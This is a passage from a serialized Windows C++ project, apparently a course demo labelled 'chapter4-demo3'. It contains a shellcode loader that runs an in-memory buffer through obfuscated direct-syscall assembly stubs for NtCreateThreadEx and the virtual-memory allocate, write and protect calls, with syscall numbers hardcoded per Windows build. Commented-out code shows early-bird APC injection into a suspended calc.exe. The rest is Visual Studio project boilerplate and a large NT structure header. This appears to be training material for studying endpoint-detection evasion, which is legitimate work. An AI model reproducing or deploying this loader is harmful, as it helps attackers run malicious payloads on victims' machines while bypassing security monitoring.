CreateThread(\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\tNULL);\r\n\t\tif (hThread == NULL)\r\n\t\t{\r\n\t\t\treturn 1;\r\n\t\t}\r\n\r\n\t\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\t\tCloseHandle(hThread);\r\n\t}*/\r\n\r\n\r\n\t/*\r\n\tCreateThread\r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL,\r\n\t\t0,\r\n\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\r\n\t//eariler bird APC\r\n\t\t/*\r\n\t\tSIZE_T shellSize = 4096;\r\n\t\tSTARTUPINFOA si = { 0 };\r\n\t\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\t\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\t\tHANDLE victimProcess = pi.hProcess;\r\n\t\tHANDLE threadHandle = pi.hThread;\r\n\r\n\t\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\t\tWriteProcessMemory(victimProcess, shellAddress, exec, shellSize, NULL);\r\n\t\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\t\tResumeThread(threadHandle);\r\n\t\t*/\r\n\r\n\r\n\t\t//((void(*)())exec)();\r\n\t\tHANDLE hThread{ nullptr };\r\n\t\tANtCTE(\r\n\t\t\t&hThread,\r\n\t\t\tTHREAD_ALL_ACCESS,\r\n\t\t\tNULL,\r\n\t\t\tGetCurrentProcess(),\r\n\t\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\tnullptr\r\n\t\t);\r\n\t\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\t}\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n// 1. Use the Solution Explorer window to add/manage files\r\n// 2. Use the Team Explorer window to connect to source control\r\n// 3. Use the Output window to see build output and other messages\r\n// 4. Use the Error List window to view errors\r\n// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n" }, { "path": "chapter4-demo3/demo1/demo1.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n {1876F365-2DEC-42C9-B80E-B631B26FCAD8}\r\n Win32Proj\r\n demo1\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n CppCode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo3/demo1/demo1.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;hm;inl;inc;ipp;xsd\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Resource Files\r\n \r\n \r\n Resource Files\\Header Files\r\n \r\n \r\n Resource Files\\Header Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n" }, { "path": "chapter4-demo3/demo1/demo1.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "chapter4-demo3/demo1/nt.asm", "content": ".code\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nbye :\r\nret\r\n\r\nNtCreateThreadEx PROC\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03EA48B99h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tsyscall ; Invoke system call.\r\n\tret\r\nNtCreateThreadEx ENDP\r\n\r\n\t\tANtCTE proc\r\n\t\t\tmov r12, rcx\r\n\t\t\tmov r13, rdx\r\n\t\t\tmov r14, r8\r\n\t\t\tmov r15, r9\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0C1h\t\t; 2004, 20H2\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\r\n\t\t\tmov rcx, r12\r\n\t\t\tmov rdx, r13\r\n\t\t\tmov r8, r14\r\n\t\t\tmov r9, r15\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0BDh\t\t; 1903, 1909\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\r\n\t\t\tmov rcx, r12\r\n\t\t\tmov rdx, r13\r\n\t\t\tmov r8, r14\r\n\t\t\tmov r9, r15\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0BCh\t\t; 1809\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\t\tANtCTE endp\r\n\t\t\r\n\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r\nsub r8, r10\r\nadd eax, 18h; 1507 +\r\nxor r8, r8\r\nsyscall\r\nret\r\nBNtAVM endp\r\n\r\n\r\nBNtWVM proc\r\nadd rcx, 0Ah\r\nxor eax, eax\r\nmov r10, rcx\r\nadd eax, 3Ah; 1507 +\r\nsub r10, 0Ah\r\nsub rcx, 0Ah\r\nsyscall\r\nret\r\nBNtWVM endp\r\n\r\n\r\nBNtPVM proc\r\nadd r10, 1Ch\r\nxor eax, eax\r\nmov r10, rcx\r\nsub r10, 01h\r\nadd eax, 50h; 1507 +\r\nadd r10, 01h\r\nsyscall\r\nret\r\nBNtPVM endp\r\n\r\n\r\nend" }, { "path": "chapter4-demo3/demo1/nt.h", "content": "#pragma once\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include \r\n\r\n#define SW3_SEED 0xA8EC79BB\r\n#define SW3_ROL8(v) (v << 8 | v >> 24)\r\n#define SW3_ROR8(v) (v >> 8 | v << 24)\r\n#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))\r\n#define SW3_MAX_ENTRIES 500\r\n#define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)\r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tULONG_PTR ZeroBits,\r\n\tPSIZE_T RegionSize,\r\n\tULONG AllocationType,\r\n\tULONG Protect\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtWVM(\r\n\tHANDLE hProcess,\r\n\tPVOID lpBaseAddress,\r\n\tPVOID lpBuffer,\r\n\tSIZE_T NumberOfBytesToRead,\r\n\tPSIZE_T NumberOfBytesRead\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtPVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tSIZE_T* NumberOfBytesToProtect,\r\n\tULONG NewAccessProtection,\r\n\tPULONG OldAccessProtection\r\n);\r\n\r\ntypedef struct _SW3_SYSCALL_ENTRY\r\n{\r\n\tDWORD Hash;\r\n\tDWORD Address;\r\n\tPVOID SyscallAddress;\r\n} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;\r\n\r\ntypedef struct _SW3_SYSCALL_LIST\r\n{\r\n\tDWORD Count;\r\n\tSW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];\r\n} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;\r\n\r\ntypedef struct _SW3_PEB_LDR_DATA {\r\n\tBYTE Reserved1[8];\r\n\tPVOID Reserved2[3];\r\n\tLIST_ENTRY InMemoryOrderModuleList;\r\n} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;\r\n\r\ntypedef struct _SW3_LDR_DATA_TABLE_ENTRY {\r\n\tPVOID Reserved1[2];\r\n\tLIST_ENTRY InMemoryOrderLinks;\r\n\tPVOID Reserved2[2];\r\n\tPVOID DllBase;\r\n} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _SW3_PEB {\r\n\tBYTE Reserved1[2];\r\n\tBYTE BeingDebugged;\r\n\tBYTE Reserved2[1];\r\n\tPVOID Reserved3[2];\r\n\tPSW3_PEB_LDR_DATA Ldr;\r\n} SW3_PEB, * PSW3_PEB;\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName);\r\nBOOL SW3_PopulateSyscallList();\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID);\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\ntypedef struct _SYSTEM_HANDLE\r\n{\r\n\tULONG ProcessId;\r\n\tBYTE ObjectTypeNumber;\r\n\tBYTE Flags;\r\n\tUSHORT Handle;\r\n\tPVOID Object;\r\n\tACCESS_MASK GrantedAccess;\r\n} SYSTEM_HANDLE, * PSYSTEM_HANDLE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE\r\n{\r\n\tPVOID pValue;\r\n\tULONG ValueLength;\r\n} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE\r\n{\r\n\tULONG64 Version;\r\n\tUNICODE_STRING Name;\r\n} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;\r\n\r\ntypedef struct _WNF_TYPE_ID\r\n{\r\n\tGUID TypeId;\r\n} WNF_TYPE_ID, * PWNF_TYPE_ID;\r\n\r\ntypedef enum _PS_CREATE_STATE\r\n{\r\n\tPsCreateInitialState,\r\n\tPsCreateFailOnFileOpen,\r\n\tPsCreateFailOnSectionCreate,\r\n\tPsCreateFailExeFormat,\r\n\tPsCreateFailMachineMismatch,\r\n\tPsCreateFailExeName,\r\n\tPsCreateSuccess,\r\n\tPsCreateMaximumStates\r\n} PS_CREATE_STATE, * PPS_CREATE_STATE;\r\n\r\ntypedef enum _KCONTINUE_TYPE\r\n{\r\n\tKCONTINUE_UNWIND,\r\n\tKCONTINUE_RESUME,\r\n\tKCONTINUE_LONGJUMP,\r\n\tKCONTINUE_SET,\r\n\tKCONTINUE_LAST\r\n} KCONTINUE_TYPE;\r\n\r\ntypedef struct _IO_STATUS_BLOCK\r\n{\r\n\tunion\r\n\t{\r\n\t\tNTSTATUS Status;\r\n\t\tVOID* Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION\r\n{\r\n\tULONG HandleCount;\r\n\tSYSTEM_HANDLE Handles[1];\r\n} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * PCLIENT_ID;\r\n\r\ntypedef enum _PLUGPLAY_EVENT_CATEGORY\r\n{\r\n\tHardwareProfileChangeEvent,\r\n\tTargetDeviceChangeEvent,\r\n\tDeviceClassChangeEvent,\r\n\tCustomDeviceEvent,\r\n\tDeviceInstallEvent,\r\n\tDeviceArrivalEvent,\r\n\tPowerEvent,\r\n\tVetoEvent,\r\n\tBlockedDriverEvent,\r\n\tInvalidIDEvent,\r\n\tMaxPlugEventCategory\r\n} PLUGPLAY_EVENT_CATEGORY, * PPLUGPLAY_EVENT_CATEGORY;\r\n\r\ntypedef enum _PNP_VETO_TYPE\r\n{\r\n\tPNP_VetoTypeUnknown, // unspecified\r\n\tPNP_VetoLegacyDevice, // instance path\r\n\tPNP_VetoPendingClose, // instance path\r\n\tPNP_VetoWindowsApp, // module\r\n\tPNP_VetoWindowsService, // service\r\n\tPNP_VetoOutstandingOpen, // instance path\r\n\tPNP_VetoDevice, // instance path\r\n\tPNP_VetoDriver, // driver service name\r\n\tPNP_VetoIllegalDeviceRequest, // instance path\r\n\tPNP_VetoInsufficientPower, // unspecified\r\n\tPNP_VetoNonDisableable, // instance path\r\n\tPNP_VetoLegacyDriver, // service\r\n\tPNP_VetoInsufficientRights // unspecified\r\n} PNP_VETO_TYPE, * PPNP_VETO_TYPE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_V1\r\n{\r\n\tUNICODE_STRING Name;\r\n\tUSHORT ValueType;\r\n\tUSHORT Reserved;\r\n\tULONG Flags;\r\n\tULONG ValueCount;\r\n\tunion\r\n\t{\r\n\t\tPLONG64 pInt64;\r\n\t\tPULONG64 pUint64;\r\n\t\tPUNICODE_STRING pString;\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;\r\n\t} Values;\r\n} TOKEN_SECURITY_ATTRIBUTE_V1, * PTOKEN_SECURITY_ATTRIBUTE_V1;\r\n\r\ntypedef VOID(KNORMAL_ROUTINE) (\r\n\tIN PVOID NormalContext,\r\n\tIN PVOID SystemArgument1,\r\n\tIN PVOID SystemArgument2);\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * PPS_ATTRIBUTE;\r\n\r\ntypedef struct _WNF_STATE_NAME\r\n{\r\n\tULONG Data[2];\r\n} WNF_STATE_NAME, * PWNF_STATE_NAME;\r\n\r\n#ifndef InitializeObjectAttributes\r\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\r\n\t(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \\\r\n\t(p)->RootDirectory = r; \\\r\n\t(p)->Attributes = a; \\\r\n\t(p)->ObjectName = n; \\\r\n\t(p)->SecurityDescriptor = s; \\\r\n\t(p)->SecurityQualityOfService = NULL; \\\r\n}\r\n#endif\r\n\r\ntypedef struct _KEY_VALUE_ENTRY\r\n{\r\n\tPUNICODE_STRING ValueName;\r\n\tULONG DataLength;\r\n\tULONG DataOffset;\r\n\tULONG Type;\r\n} KEY_VALUE_ENTRY, * PKEY_VALUE_ENTRY;\r\n\r\ntypedef enum _KEY_SET_INFORMATION_CLASS\r\n{\r\n\tKeyWriteTimeInformation,\r\n\tKeyWow64FlagsInformation,\r\n\tKeyControlFlagsInformation,\r\n\tKeySetVirtualizationInformation,\r\n\tKeySetDebugInformation,\r\n\tKeySetHandleTagsInformation,\r\n\tMaxKeySetInfoClass // MaxKeySetInfoClass should always be the last enum.\r\n} KEY_SET_INFORMATION_CLASS, * PKEY_SET_INFORMATION_CLASS;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation = 0,\r\n\tSystemPerformanceInformation = 2,\r\n\tSystemTimeOfDayInformation = 3,\r\n\tSystemProcessInformation = 5,\r\n\tSystemProcessorPerformanceInformation = 8,\r\n\tSystemHandleInformation = 16,\r\n\tSystemInterruptInformation = 23,\r\n\tSystemExceptionInformation = 33,\r\n\tSystemRegistryQuotaInformation = 37,\r\n\tSystemLookasideInformation = 45,\r\n\tSystemCodeIntegrityInformation = 103,\r\n\tSystemPolicyInformation = 134,\r\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef enum _PROCESSINFOCLASS\r\n{\r\n\tProcessBasicInformation = 0,\r\n\tProcessDebugPort = 7,\r\n\tProcessWow64Information = 26,\r\n\tProcessImageFileName = 27,\r\n\tProcessBreakOnTermination = 29\r\n} PROCESSINFOCLASS, * PPROCESSINFOCLASS;\r\n\r\ntypedef struct _MEMORY_RANGE_ENTRY\r\n{\r\n\tPVOID VirtualAddress;\r\n\tSIZE_T NumberOfBytes;\r\n} MEMORY_RANGE_ENTRY, * PMEMORY_RANGE_ENTRY;\r\n\r\ntypedef struct _T2_SET_PARAMETERS_V0\r\n{\r\n\tULONG Version;\r\n\tULONG Reserved;\r\n\tLONGLONG NoWakeTolerance;\r\n} T2_SET_PARAMETERS, * PT2_SET_PARAMETERS;\r\n\r\ntypedef struct _FILE_PATH\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Type;\r\n\tCHAR FilePath[1];\r\n} FILE_PATH, * PFILE_PATH;\r\n\r\ntypedef struct _FILE_USER_QUOTA_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tULONG SidLength;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tLARGE_INTEGER QuotaUsed;\r\n\tLARGE_INTEGER QuotaThreshold;\r\n\tLARGE_INTEGER QuotaLimit;\r\n\tSID Sid[1];\r\n} FILE_USER_QUOTA_INFORMATION, * PFILE_USER_QUOTA_INFORMATION;\r\n\r\ntypedef struct _FILE_QUOTA_LIST_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tULONG SidLength;\r\n\tSID Sid[1];\r\n} FILE_QUOTA_LIST_INFORMATION, * PFILE_QUOTA_LIST_INFORMATION;\r\n\r\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION\r\n{\r\n\tLARGE_INTEGER CreationTime;\r\n\tLARGE_INTEGER LastAccessTime;\r\n\tLARGE_INTEGER LastWriteTime;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tLARGE_INTEGER AllocationSize;\r\n\tLARGE_INTEGER EndOfFile;\r\n\tULONG FileAttributes;\r\n\tULONG Unknown;\r\n} FILE_NETWORK_OPEN_INFORMATION, * PFILE_NETWORK_OPEN_INFORMATION;\r\n\r\ntypedef enum _FILTER_BOOT_OPTION_OPERATION\r\n{\r\n\tFilterBootOptionOperationOpenSystemStore,\r\n\tFilterBootOptionOperationSetElement,\r\n\tFilterBootOptionOperationDeleteElement,\r\n\tFilterBootOptionOperationMax\r\n} FILTER_BOOT_OPTION_OPERATION, * PFILTER_BOOT_OPTION_OPERATION;\r\n\r\ntypedef enum _EVENT_TYPE\r\n{\r\n\tNotificationEvent = 0,\r\n\tSynchronizationEvent = 1,\r\n} EVENT_TYPE, * PEVENT_TYPE;\r\n\r\ntypedef struct _FILE_FULL_EA_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tUCHAR Flags;\r\n\tUCHAR EaNameLength;\r\n\tUSHORT EaValueLength;\r\n\tCHAR EaName[1];\r\n} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;\r\n\r\ntypedef struct _FILE_GET_EA_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tBYTE EaNameLength;\r\n\tCHAR EaName[1];\r\n} FILE_GET_EA_INFORMATION, * PFILE_GET_EA_INFORMATION;\r\n\r\ntypedef struct _BOOT_OPTIONS\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Timeout;\r\n\tULONG CurrentBootEntryId;\r\n\tULONG NextBootEntryId;\r\n\tWCHAR HeadlessRedirection[1];\r\n} BOOT_OPTIONS, * PBOOT_OPTIONS;\r\n\r\ntypedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;\r\n\r\ntypedef enum _WNF_DATA_SCOPE\r\n{\r\n\tWnfDataScopeSystem = 0,\r\n\tWnfDataScopeSession = 1,\r\n\tWnfDataScopeUser = 2,\r\n\tWnfDataScopeProcess = 3,\r\n\tWnfDataScopeMachine = 4\r\n} WNF_DATA_SCOPE, * PWNF_DATA_SCOPE;\r\n\r\ntypedef enum _WNF_STATE_NAME_LIFETIME\r\n{\r\n\tWnfWellKnownStateName = 0,\r\n\tWnfPermanentStateName = 1,\r\n\tWnfPersistentStateName = 2,\r\n\tWnfTemporaryStateName = 3\r\n} WNF_STATE_NAME_LIFETIME, * PWNF_STATE_NAME_LIFETIME;\r\n\r\ntypedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS\r\n{\r\n\tVmPrefetchInformation,\r\n\tVmPagePriorityInformation,\r\n\tVmCfgCallTargetInformation\r\n} VIRTUAL_MEMORY_INFORMATION_CLASS, * PVIRTUAL_MEMORY_INFORMATION_CLASS;\r\n\r\ntypedef enum _IO_SESSION_EVENT\r\n{\r\n\tIoSessionEventIgnore,\r\n\tIoSessionEventCreated,\r\n\tIoSessionEventTerminated,\r\n\tIoSessionEventConnected,\r\n\tIoSessionEventDisconnected,\r\n\tIoSessionEventLogon,\r\n\tIoSessionEventLogoff,\r\n\tIoSessionEventMax\r\n} IO_SESSION_EVENT, * PIO_SESSION_EVENT;\r\n\r\ntypedef enum _PORT_INFORMATION_CLASS\r\n{\r\n\tPortBasicInformation,\r\n#if DEVL\r\n\tPortDumpInformation\r\n#endif\r\n} PORT_INFORMATION_CLASS, * PPORT_INFORMATION_CLASS;\r\n\r\ntypedef enum _PLUGPLAY_CONTROL_CLASS\r\n{\r\n\tPlugPlayControlEnumerateDevice,\r\n\tPlugPlayControlRegisterNewDevice,\r\n\tPlugPlayControlDeregisterDevice,\r\n\tPlugPlayControlInitializeDevice,\r\n\tPlugPlayControlStartDevice,\r\n\tPlugPlayControlUnlockDevice,\r\n\tPlugPlayControlQueryAndRemoveDevice,\r\n\tPlugPlayControlUserResponse,\r\n\tPlugPlayControlGenerateLegacyDevice,\r\n\tPlugPlayControlGetInterfaceDeviceList,\r\n\tPlugPlayControlProperty,\r\n\tPlugPlayControlDeviceClassAssociation,\r\n\tPlugPlayControlGetRelatedDevice,\r\n\tPlugPlayControlGetInterfaceDeviceAlias,\r\n\tPlugPlayControlDeviceStatus,\r\n\tPlugPlayControlGetDeviceDepth,\r\n\tPlugPlayControlQueryDeviceRelations,\r\n\tPlugPlayControlTargetDeviceRelation,\r\n\tPlugPlayControlQueryConflictList,\r\n\tPlugPlayControlRetrieveDock,\r\n\tPlugPlayControlResetDevice,\r\n\tPlugPlayControlHaltDevice,\r\n\tPlugPlayControlGetBlockedDriverList,\r\n\tMaxPlugPlayControl\r\n} PLUGPLAY_CONTROL_CLASS, * PPLUGPLAY_CONTROL_CLASS;\r\n\r\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS\r\n{\r\n\tIoCompletionBasicInformation\r\n} IO_COMPLETION_INFORMATION_CLASS, * PIO_COMPLETION_INFORMATION_CLASS;\r\n\r\ntypedef enum _SECTION_INHERIT\r\n{\r\n\tViewShare = 1,\r\n\tViewUnmap = 2\r\n} SECTION_INHERIT, * PSECTION_INHERIT;\r\n\r\ntypedef enum _DEBUGOBJECTINFOCLASS\r\n{\r\n\tDebugObjectFlags = 1,\r\n\tMaxDebugObjectInfoClass\r\n} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;\r\n\r\ntypedef enum _SEMAPHORE_INFORMATION_CLASS\r\n{\r\n\tSemaphoreBasicInformation\r\n} SEMAPHORE_INFORMATION_CLASS, * PSEMAPHORE_INFORMATION_CLASS;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\ntypedef enum _VDMSERVICECLASS\r\n{\r\n\tVdmStartExecution,\r\n\tVdmQueueInterrupt,\r\n\tVdmDelayInterrupt,\r\n\tVdmInitialize,\r\n\tVdmFeatures,\r\n\tVdmSetInt21Handler,\r\n\tVdmQueryDir,\r\n\tVdmPrinterDirectIoOpen,\r\n\tVdmPrinterDirectIoClose,\r\n\tVdmPrinterInitialize,\r\n\tVdmSetLdtEntries,\r\n\tVdmSetProcessLdtInfo,\r\n\tVdmAdlibEmulation,\r\n\tVdmPMCliControl,\r\n\tVdmQueryVdmProcess\r\n} VDMSERVICECLASS, * PVDMSERVICECLASS;\r\n\r\ntypedef struct _PS_CREATE_INFO\r\n{\r\n\tSIZE_T Size;\r\n\tPS_CREATE_STATE State;\r\n\tunion\r\n\t{\r\n\t\t// PsCreateInitialState\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG InitFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR WriteOutputOnExit : 1;\r\n\t\t\t\t\tUCHAR DetectManifest : 1;\r\n\t\t\t\t\tUCHAR IFEOSkipDebugger : 1;\r\n\t\t\t\t\tUCHAR IFEODoNotPropagateKeyState : 1;\r\n\t\t\t\t\tUCHAR SpareBits1 : 4;\r\n\t\t\t\t\tUCHAR SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT ProhibitedImageCharacteristics : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tACCESS_MASK AdditionalFileAccess;\r\n\t\t} InitState;\r\n\t\t// PsCreateFailOnSectionCreate\r\n\t\tstruct {\r\n\t\t\tHANDLE FileHandle;\r\n\t\t} FailSection;\r\n\t\t// PsCreateFailExeFormat\r\n\t\tstruct {\r\n\t\t\tUSHORT DllCharacteristics;\r\n\t\t} ExeFormat;\r\n\t\t// PsCreateFailExeName\r\n\t\tstruct {\r\n\t\t\tHANDLE IFEOKey;\r\n\t\t} ExeName;\r\n\t\t// PsCreateSuccess\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG OutputFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR ProtectedProcess : 1;\r\n\t\t\t\t\tUCHAR AddressSpaceOverride : 1;\r\n\t\t\t\t\tUCHAR DevOverrideEnabled : 1; // from Image File Execution Options\r\n\t\t\t\t\tUCHAR ManifestDetected : 1;\r\n\t\t\t\t\tUCHAR ProtectedProcessLight : 1;\r\n\t\t\t\t\tUCHAR SpareBits1 : 3;\r\n\t\t\t\t\tUCHAR SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT SpareBits3 : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tHANDLE FileHandle;\r\n\t\t\tHANDLE 